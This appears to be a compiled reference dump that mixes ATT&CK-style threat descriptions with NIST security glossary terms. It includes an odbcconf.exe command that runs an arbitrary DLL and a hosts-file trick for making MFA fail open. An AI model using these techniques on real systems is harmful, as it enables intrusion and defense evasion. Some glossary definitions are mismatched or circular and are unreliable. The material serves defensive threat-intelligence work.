Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a Launch Daemon) with the elevated permissions.

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.

For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.

Term: <em>A</em>
Definition: The additional authenticated data

Term: <em>[a, b]</em>
Definition: The set of integers x such that a ≤ x ≤ b.

Name: Cloud Accounts
Type: attack-pattern
Description: Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory.

Service or user accounts may be targeted by adversaries through Brute Force, Phishing, or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto Remote Services. High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based Software Deployment Tools to run commands on hybrid-joined devices.

An adversary may create long lasting Additional Cloud Credentials on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. 

Cloud accounts may also be able to assume Temporary Elevated Cloud Access or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through Cloud API or other methods. For example, in Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to Steal Application Access Tokens to move laterally across the cloud environment.

Term: EO-critical software
Definition: Any software that has, or has direct software dependencies upon, one or more components with at least one of these attributes:
· is designed to run with elevated privilege or manage privileges;
· has direct or privileged access to networking or computing resources;
· is designed to control access to data or operational technology;
· performs a function critical to trust; or,
· operates outside of normal trust boundaries with privileged access.

Name: SMB/Windows Admin Shares
Type: attack-pattern
Description: Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB, to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task/Job, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.

Term: Key states
Definition: The states through which a key transitions between its generation and its destruction. See Pre-activation state, Active state, Suspended state, Deactivated state, Compromised state, and Destroyed state.

Term: safety critical system
Definition: A system whose failure, malfunction, design flaw, or manufacturing flaw may result in one (or more) of the following outcomes: loss of life, serious injury to people, environmental damage/destruction, or loss or severe damage to equipment/property.

Term: Specification versioning
Definition: The process of denoting a revision to a specification by changing its version number.

Term: tainting
Definition: The process of embedding covert capabilities in information, systems, or system components to allow organizations to be alerted to the exfiltration of information.

Term: Information Security Testing
Definition: The process of validating the effective implementation of security controls for information systems and networks, based on the organization’s security requirements.

Term: <em>x·y</em>
Definition: The product of two integers, x and y.

Name: Upload Tool
Type: attack-pattern
Description: Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.

Tools may be placed on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.

Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.

Term: authentication protocol
Definition: 2. A defined sequence of messages between a Claimant and a Verifier that demonstrates that the Claimant has possession and control of a valid token to establish his/her identity, and optionally, demonstrates to the Claimant that he or she is communicating with the intended Verifier.

Term: SA
Definition: A person who manages a computer system, including its operating system and applications. Responsibilities are similar to that of a network administrator.

Term: Problematic Data Action
Definition: A system operation that processes PII through the information lifecycle and as a side effect causes individuals to experience some type of problem(s).

Term: OT
Definition: The hardware, software, and firmware components of a system used to detect or cause changes in physical processes through the direct control and monitoring of physical devices.

Term: permanent connection
Definition: A perpetual communication channel. Permanent connections are most often made via a dedicated circuit.

Name: AppCert DLLs
Type: attack-pattern
Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. 

Similar to Process Injection, this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.

Term: concept of secure function
Definition: A strategy for the achievement of secure system function that embodies the preemptive and reactive protection capabilities of the system.

Term: Hotwash
Definition: A debrief conducted immediately after an exercise or test with the staff and participants.

Term: non-disclosure agreement
Definition: Delineates specific information, materials, or knowledge that the signatories agree not to release or divulge to any other parties.

Term: Key registration
Definition: A function in the lifecycle of a cryptographic key; the process of officially recording the keying material by a registration authority.

Term: regression
Definition: A type of supervised machine learning model that is trained on data, including numerical labels (i.e., response variables). Types of regression algorithms include linear regression, polynomial regression, and various non-linear regression meth­ods.

Name: Transparent Tribe
Type: intrusion-set
Description: Transparent Tribe is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.

Name: evilginx2
Type: tool
Description: evilginx2 is an open-source adversary-in-the-middle (AiTM) attack framework based on the open-source nginx web server. evilginx2 can be used as a reverse proxy between victims and legitimate web services to intercept and capture credentials, authentication tokens, and session cookies.

Term: memorized secret
Definition: A string of characters (letters, numbers, and other symbols) used to authenticate an identity or to verify access authorization.

Term: Cybersecurity Incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system; or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Term: Correlation
Definition: Finding relationships between two or more log entries.

Term: Personal Firewall
Definition: A utility on a computer that monitors network activity and blocks communications that are unauthorized.

Term: KDK
Definition: As used in this Recommendation, either a one-step key-derivation method or a key-derivation function based on a pseudorandom function as specified in [SP 800-108].

Name: Web Session Cookie
Type: attack-pattern
Description: Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through Steal Web Session Cookie or Web Cookies, the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.

Term: KC
Definition: A procedure that provides assurance to one party (i.e., key-confirmation recipient) that another party (i.e., key-confirmation provider) possesses the correct secret keying material and/or shared secret from which that secret keying material is derived.

Term: reference validation mechanism
Definition: An implementation of the reference monitor concept that validates each access to resources against a list of authorized accesses allowed.

Term: KE
Definition: The process of exchanging public keys in order to establish secure communications.

Name: FIN13
Type: intrusion-set
Description: FIN13 is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. FIN13 achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.

Term: <em>s</em>
Definition: The number of bits in a data segment.

Term: threat information
Definition: Any information related to a threat that might help an organization protect itself against the threat or detect the activities of an actor. Major types of threat information include indicators, TTPs, security alerts, threat intelligence reports, and tool configurations.

Term: Software Development Life Cycle
Definition: A formal or informal methodology for designing, creating, and maintaining software (including code built into hardware).

Term: ongoing assessment and authorization
Definition: Maintaining ongoing awareness of information security, vulnerabilities, and threats to support organizational risk management decisions. 
Note: The terms “continuous” and “ongoing” in this context mean that security controls and organizational risks are assessed and analyzed at a frequency sufficient to support risk-based security decisions to adequately protect organization information. 
See organizational information security continuous monitoring and automated security monitoring.

Term: identity verification
Definition: Process of producing objective evidence that sufficiently demonstrates that the system satisfies its security requirements and security characteristics with the level of assurance that applies to the system.

Name: FIN4
Type: intrusion-set
Description: FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.

Term: Support a security strength
Definition: A term applied to a method (e.g., an RBG, or a key with its associated cryptographic algorithm) that is capable of providing (at a minimum) the security strength required or desired for protecting data.

Term: penetration testing
Definition: A test methodology intended to circumvent the security function of a system. 
Note: Penetration testing may leverage system documentation (e.g., system design, source code, manuals) and is conducted within specific constraints. Some penetration test methods use brute force techniques.

Term: pseudorandom number generator
Definition: A deterministic computational process that has one or more inputs called "seeds", and it outputs a sequence of values that appears to be random according to specified statistical tests. A cryptographic PRNG has the additional property that the output is unpredictable, given that the seed is not known.

Term: certificate revocation list (CRL)
Definition: A list maintained by a Certification Authority of the certificates which it has issued that are revoked prior to their stated expiration date.

Term: cyberspace attack
Definition: Cyberspace actions that create various direct denial effects (i.e., degradation, disruption, or destruction) and manipulation that leads to denial and that is hidden or that manifests in the physical domains.

Term: Archive facility
Definition: Noun: See Archive facility.

Name: Avaddon
Type: malware
Description: Avaddon is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.

Term: security requirement
Definition: Requirements levied on an information system that are derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, or procedures, or organizational mission/business case needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.

Term: OLIR Developer
Definition: A general term that includes: (i) developers or manufacturers of information systems, system components, or information system services; (ii) systems integrators; (iii) vendors; and (iv) product resellers. Development of systems, components, or services can occur internally within organizations (i.e., in-house development) or through external entities.

Term: Identity Key
Definition: A private key that is used for authentication in the SSH protocol; grants access  to the accounts for which the corresponding public key has been configured as an authorized key.

Term: resource
Definition: An operating system abstraction that is visible at the application program interface, has a unique name, and capable of being shared.  In this document, the following are resources: files, programs, directories, databases, mini-disks, and special files.  In this document, the following are not resources: records, blocks, pages, segments, bits, bytes, words, fields, and processors.

Term: decapsulation key
Definition: A cryptographic key produced by a KEM during key generation and used during the decapsulation process. The decapsulation key must be kept private and must be destroyed after it is no longer needed.

Term: cryptographic modernization
Definition: A DoD initiative to modernize the NSA-certified cryptographic product inventory.

Term: Sponsor (of a key)
Definition: A human entity that is responsible for managing a key for the non-human entity (e.g., organization, device, application or process) that is authorized to use the key.

Term: mechanism
Definition: A natural or established process by which something takes place or is brought about.

Term: COMSEC demilitarization
Definition: The act of eliminating the functional capabilities and/or inherent military design features [from DoD personal property]. Methods and degree range from removal and destruction of critical features to total destruction by cutting, crushing, shredding, melting, burning, etc. Note: Demilitarization is required to prevent property from being used for its originally intended purpose and to prevent the release of inherent design information that could be used against the United States. Demilitarization applies to material in both serviceable and unserviceable condition.

Name: Delay Execution
Type: attack-pattern
Description: Adversaries may employ various time-based methods to evade detection and analysis. These techniques often exploit system clocks, delays, or timing mechanisms to obscure malicious activity, blend in with benign activity, and avoid scrutiny. Adversaries can perform this behavior within virtualization/sandbox environments or natively on host systems. 

Adversaries may utilize programmatic `sleep` commands or native system scheduling functionality, for example Scheduled Task/Job. Benign commands or other operations may also be used to delay malware execution or ensure prior commands have had time to execute properly. Loops or otherwise needless repetitions of commands, such as `ping`, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments. Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).

Term: Rule
Definition: An element that holds check references and may also hold remediation information.

Term: Modification, Access, and Creation
Definition: Message Authentication Code.

Term: CKMS design
Definition: The capabilities that were selected and specified by a CKMS designer to be implemented and supported in a CKMS product.

Term: AC
Definition: The process of limiting access to resources of a system only to authorized programs, processes, or other systems (in a network).

Term: Assumption
Definition: This term is used to indicate the conditions that are required to be true when an approved key-establishment scheme is executed in accordance with this Recommendation.

Term: SP
Definition: A provider of basic services or value-added services for operation of a network ­ generally refers to public carriers and other commercial enterprises.

Term: Log Conversion
Definition: Parsing a log in one format and storing its entries in a second format.

Name: Kali365
Type: malware
Description: Kali365 is a Phishing-as-a-Service (PHaaS) kit first observed in April 2026 that generates victim-targeted lures across multiple operating systems to induce users into copying and pasting actor-controlled commands for local execution. Kali365 incorporates on-demand device code generation and mirrors the copy-paste execution tradecraft associated with ClickFix. Operators have used Kali365 to harvest victims' OAuth tokens and session cookies through adversary-in-the-middle (AiTM) interception, enabling account takeover. Kali365 PHaaS was first observed in April 2026. Kali365 has also been affiliated with other branding to include Octopi365 and Freedom365.

Term: <em>CIPHK(X)</em>
Definition: The output of the forward cipher function of the block cipher algorithm under the key K applied to the data block X.

Name: Daserf
Type: malware
Description: Daserf is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi.

Term: CTTA
Definition: An experienced, technically qualified U.S. Government employee who has met established certification requirements in accordance with CNSS approved criteria and has been appointed by a U.S. Government Department or Agency to fulfill CTTA responsibilities.

Term: local access
Definition: Access to an organizational system by a user (or process acting on behalf of a user) communicating through a direct connection without the use of a network.

Term: NSS
Definition: Any information system (including any telecommunications system) used or operated by an agency or by a contractor on behalf of an agency, or any other organization on behalf of an agency –
(i) the function, operation, or use of which: involves intelligence activities; involves cryptologic activities related to national security; involves command and control of military forces; involves equipment that is an integral part of a weapon or weapon system; or is critical to the direct fulfillment of military or intelligence missions (excluding a system that is to be used for routine administrative and business applications, for example payroll, finance, logistics, and personnel management applications); or 
(ii) is protected at all times by procedures established by an Executive order or an Act of Congress to be kept classified in the interest of national defense or foreign policy.

Term: approval to operate
Definition: Official management decision given by a senior Federal official or officials to authorize operation of an information system and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security and privacy controls. Authorization also applies to common controls inherited by agency information systems. Note 1: The system is authorized to operate for a specified period in accordance with terms and conditions established by the authorizing official. Note 2: Formerly known as "approval to operate." Term was replaced in the risk management framework in 2010.

Term: authenticate
Definition: A security measure designed to protect a communications system against acceptance of fraudulent transmission or simulation by establishing the validity of a transmission, message, originator, or a means of verifying an individual's eligibility to receive specific categories of information.

Name: TA459
Type: intrusion-set
Description: TA459 is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others.

Term: P1
Definition: First parameter of a card command

Term: hash value/result
Definition: The result of applying a hash function to a message. Also known as a “hash value.”

Term: Cryptographic algorithm
Definition: 2. Well-defined procedure or sequence of rules or steps, or a series of mathematical equations used to describe cryptographic processes such as encryption/decryption, key generation, authentication, signatures, etc.

Name: STATICPLUGIN
Type: malware
Description: STATICPLUGIN is a downloader known to be leveraged by Mustang Panda and was first observed utilized in 2025. STATICPLUGIN has utilized a valid certificate in order to bypass endpoint security protections. STATICPLUGIN masqueraded as legitimate software installer by using a custom TForm. STATICPLUGIN has been leveraged to deploy a loader that facilitates follow on malware.

Term: relative error
Definition: The absolute error divided by the unaltered query output.

Term: attribute
Definition: See Attribute

Term: Secure Sockets Layer (SSL)
Definition: Provides privacy and data integrity between two communicating applications. It is designed to encapsulate other protocols, such as HTTP. TLS v1.0 was released in 1999, providing slight modifications to SSL 3.0.

Term: system user
Definition: Individual, or (system) process acting on behalf of an individual, authorized to access a system.

Term: Certificate Authority Authorization
Definition: A record associated with a Domain Name Server (DNS) entry that specifies the CAs that are authorized to issue certificates for that domain.

Term: Sensing Capability
Definition: The ability to provide an observation of an aspect of the physical world in the form of measurement data.

Term: GNN
Definition: A neural network designed to process graph-structured data. GNNs perform optimizable transformations on graph attributes (e.g., nodes, edges, global context) while preserving graph symmetries such as permutation invariance. GNNs utilize a “graph-in, graph-out” architecture that takes an input graph with informa­tion and progressively transforms it into an output graph with the same connec­tivity as that of the input graph.

Name: Compromise Software Dependencies and Development Tools
Type: attack-pattern
Description: Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications, such as pip and NPM packages, may be targeted as a means to add malicious code to users of the dependency. This may also include abandoned packages, which in some cases could be re-registered by threat actors after being removed by adversaries. Adversaries may also employ "typosquatting" or name-confusion by choosing names similar to existing popular libraries or packages in order to deceive a user.

Additionally, CI/CD pipeline components, such as GitHub Actions, may be targeted in order to gain access to the building, testing, and deployment cycles of an application. By adding malicious code into a GitHub action, a threat actor may be able to collect runtime credentials (e.g., via Proc Filesystem) or insert further malicious components into the build pipelines for a second-order supply chain compromise. As GitHub Actions are often dependent on other GitHub Actions, threat actors may be able to infect a large number of repositories via the compromise of a single Action.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

Term: certificate revocation list (CRL)
Definition: 1. A list of revoked public key certificates created and digitally signed by a Certificate Authority.

Term: Access Vector
Definition: measures an attacker’s ability to successfully exploit a vulnerability based on how remote an attacker can be, from a networking perspective, to an information system.

Name: Odbcconf
Type: attack-pattern
Description: Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names. The Odbcconf.exe binary may be digitally signed by Microsoft.

Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A &lbrace;REGSVR "C:\Users\Public\file.dll"&rbrace;</code>).

Term: Operation
Definition: the set of access modes or types permitted on objects of the system.

Term: CRL
Definition: A list of revoked public key certificates&nbsp;created and digitally signed by a certification&nbsp;authority.

Term: Form Factor
Definition: The physical characteristics of a device or object including its size, shape, packaging, handling, and weight.

Term: privacy control
Definition: The administrative, technical, and physical safeguards employed within an agency to ensure compliance with applicable privacy requirements and manage privacy risks.

Term: Cryptographic module
Definition: The set of hardware, software, and/or firmware that implements approved security functions (including cryptographic algorithms and key generation) and is contained within a cryptographic boundary.

Term: impact value
Definition: See impact value.

Term: <strong>Should</strong>
Definition: This term is used to indicate a very important recommendation. Ignoring the recommendation could result in undesirable results. Note that should may be coupled with not to become should not.

Term: chief information security officer
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Modernization Act FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. 
Note 1: With respect to SecCM, a Senior Agency Information Security Officer is an individual that provides organization-wide procedures and/or templates for SecCM, manages or participates in the Configuration Control Board, and/or provides technical staff for security impact analyses. 
Note 2: Organizations subordinate to federal agencies may use the term Senior Agency Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Term: hash output
Definition: The result of applying a hash function to a message. Also known as a “hash value.”

Term: module
Definition: See Cryptographic module.

Term: Randomness Source
Definition: A component of a DRBG (which consists of a DRBG mechanism and a randomness source) that outputs bitstrings that are used as entropy input by the DRBG mechanism. The randomness source can be an entropy source or an RBG.

Term: Identifying Information
Definition: Information that can be used to distinguish or trace an individual's identity, either alone or when combined with other information that is linked or linkable to a specific individual.

Term: encrypted key
Definition: Key that has been encrypted in a system approved by the National Security Agency (NSA) for key encryption.

Term: information system component
Definition: A system, component, application, etc., that is based upon technology which is used to electronically process, store, or transmit information.

Term: identity verification
Definition: The process of confirming or denying that a claimed identity is correct by comparing the credentials (something you know, something you have, something you are) of a person requesting access with those previously proven and stored in the PIV Card or system and associated with the identity being claimed.

Term: tabletop materials
Definition: Materials designed for a discussion-based exercise in which personnel with roles and responsibilities in a particular IT plan meet in a classroom setting or in breakout groups to discuss their roles during an emergency and their responses to a particular emergency situation. A facilitator initiates the discussion by presenting a scenario and asking questions based on that scenario.

Term: Lines of Business
Definition: “Lines of business” or “areas of operation” describe the purpose of government in functional terms or describe the support functions that the government must conduct in order to effectively deliver services to citizens. Lines of business relating to the purpose of government and the purposes tend to be mechanisms the government uses to achieve its mission-based. Lines of business relating to support functions and resource management functions that are necessary to conduct government operations tend to be common to most agencies. The recommended information types provided in NIST SP 800-60 are established from the “business areas” and “lines of business” from OMB’s Business Reference Model (BRM) section of Federal Enterprise Architecture (FEA) Consolidated Reference Model Document Version 2.3

Term: Enrollment
Definition: The process of making a person’s identity known to the PIV system, associating a unique identifier with that identity, and collecting and recording the person’s relevant attributes into the system. In some other NIST documents, such as [NIST SP 800-63A], identity registration is referred to as enrollment.

Name: Trust Modification
Type: attack-pattern
Description: Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources. These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge SAML Tokens without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user. 

An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant. This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.

Term: SoD
Definition: refers to the principle that no user should be given enough privileges to misuse the system on their own. For example, the person authorizing a paycheck should not also be the one who can prepare them. Separation of duties can be enforced either statically (by defining conflicting roles, i.e., roles which cannot be executed by the same user) or dynamically (by enforcing the control at access time). An example of dynamic separation of duty is the two-person rule. The first user to execute a two-person operation can be any authorized user, whereas the second user can be any authorized user different from the first [R.S. Sandhu., and P Samarati, “Access Control: Principles and Practice,” IEEE Communications Magazine 32(9), September 1994, pp. 40-48.]. There are various types of SOD, an important one is history-based SOD that regulate for example, the same subject (role) cannot access the same object for variable number of times.

Term: cipher
Definition: Any cryptographic system in which arbitrary symbols or groups of symbols, represent units of plain text, or in which units of plain text are rearranged, or both.

Name: KillDisk
Type: malware
Description: KillDisk is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of BlackEnergy malware during cyber attacks against Ukraine in 2015. KillDisk has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some KillDisk variants.

Term: Privacy Breach
Definition: The loss of control, compromise, unauthorized disclosure, unauthorized acquisition, or any similar occurrence where (1) a person other than an authorized user accesses or potentially accesses data or (2) an authorized user accesses data for an other than authorized purpose.

Term: hash function
Definition: A function that maps a bit string of arbitrary (although bounded) length to a fixed-length bit string. Approved hash functions satisfy the following properties: 1. (One-way) It is computationally infeasible to find any input that maps to any pre-specified output. 2. (Collision-resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: SSD
Definition: A Solid State Drive (SSD) is a storage device that uses solid state memory to store persistent data.

Term: Hardware Driver
Definition: Applications responsible for establishing communication between hardware and software programs.

Term: technique
Definition: See cyber resiliency technique.

Term: control effectiveness
Definition: A measure of whether a given control is contributing to the reduction of information security or privacy risk.

Term: Information System User
Definition: A person, team, or organization that accesses or otherwise uses an OLIR.

Term: accountability
Definition: A privacy principle (FIPP) that refers to an organization's requirements to demonstrate their implementation of the FIPPs and applicable privacy requirements.

Term: Assurance of validity
Definition: Confidence that an RSA key pair is arithmetically correct.

Term: mitigation
Definition: A decision, action, or practice intended to reduce the level of risk associated with one or more threat events, threat scenarios, or vulnerabilities.

Term: CBEFF Nested Structure
Definition: A CBEFF Nested Structure consists of a Root Header followed by Sub-Headers, one or more CBEFF Basic Structures, and an optional Signature Block

Term: Stateful
Definition: Refers to a data representation or a process that is dependent on an external data store.

Term: Capability, Behavior Management
Definition: See Capability, Behavior Management.

Term: Non-Technical Supporting Capability
Definition: Non-technical supporting capabilities are actions an organization performs in support of the cybersecurity of an IoT device.

Name: LockerGoga
Type: malware
Description: LockerGoga is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.

Term: assignment operation
Definition: See organization-defined parameters&nbsp;and selection operation.

Term: <em>⎾x⏋</em>
Definition: The ceiling of x; the smallest integer ≥ x. For example,⎾5⏋= 5 and⎾5.2⏋= 6.

Term: Rule-Based Event Correlation
Definition: Correlating events by matching multiple log entries from a single source or multiple sources based on logged values, such as timestamps, IP addresses, and event types.

Name: Publish/Subscribe Protocols
Type: attack-pattern
Description: Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Protocols such as <code>MQTT</code>, <code>XMPP</code>, <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design, with message distribution managed by a centralized broker. Publishers categorize their messages by topics, while subscribers receive messages according to their subscribed topics. An adversary may abuse publish/subscribe protocols to communicate with systems under their control from behind a message broker while also mimicking normal, expected traffic.

Term: Wiping
Definition: Overwriting media or portions of media with random or constant values to hinder the collection of data.

Term: trustworthiness
Definition: Security decision with respect to extended investigations to determine and confirm qualifications, and suitability to perform specific tasks and responsibilities.

Name: P8RAT
Type: malware
Description: P8RAT is a fileless malware used by menuPass to download and execute payloads since at least 2020.

Term: system life cycle
Definition: Period that begins when a system is conceived and ends when the system is no longer available for use.

Term: Indicator of Compromise
Definition: Technical artifacts or observables that suggest that an attack is imminent or is currently underway or that a compromise may have already occurred.

Name: Fgdump
Type: tool
Description: Fgdump is a Windows password hash dumper.

Name: Multi-Factor Authentication
Type: attack-pattern
Description: Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.

Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as Multi-Factor Authentication Request Generation, adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.

For example, modifying the Windows hosts file (`C:\windows\system32\drivers\etc\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. 

Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.

Term: key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation. 
Examples applicable to this Standard include: 
1. The computation of a digital signature from data, and 
2. The verification of a digital signature.

Term: MA
Definition: Any act that either prevents the failure or malfunction of equipment or restores its operating capability.

Name: System Network Configuration Discovery
Type: attack-pattern
Description: Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.

Adversaries may also leverage a Network Device CLI on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>). On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.

Adversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

Term: system-related security risk
Definition: Risk that arises through the loss of confidentiality, integrity, or availability of information or systems and that considers impacts to the organization (including assets, mission, functions, image, or reputation), individuals, other organizations, and the Nation.

Name: BACKSPACE
Type: malware
Description: BACKSPACE is a backdoor used by APT30 that dates back to at least 2005.

Term: retrieval-augmented generation
Definition: A type of GenAI system in which a model is paired with a separate information retrieval system (or ”knowledge base”). Based on a user query, the RAG system identifies relevant information within the knowledge base and provides it to the GenAI model in context for the model to use in formu­lating its response. RAG systems allow the internal knowledge of a GenAI model to be modified without the need for retraining.

Term: group authenticator
Definition: Used, sometimes in addition to a sign-on authenticator, to allow access to specific data or functions that may be shared by all members of a particular group.

Term: TCFB
Definition: TDEA Cipher Feedback Mode of Operation

Term: Decentralized Autonomous Organization
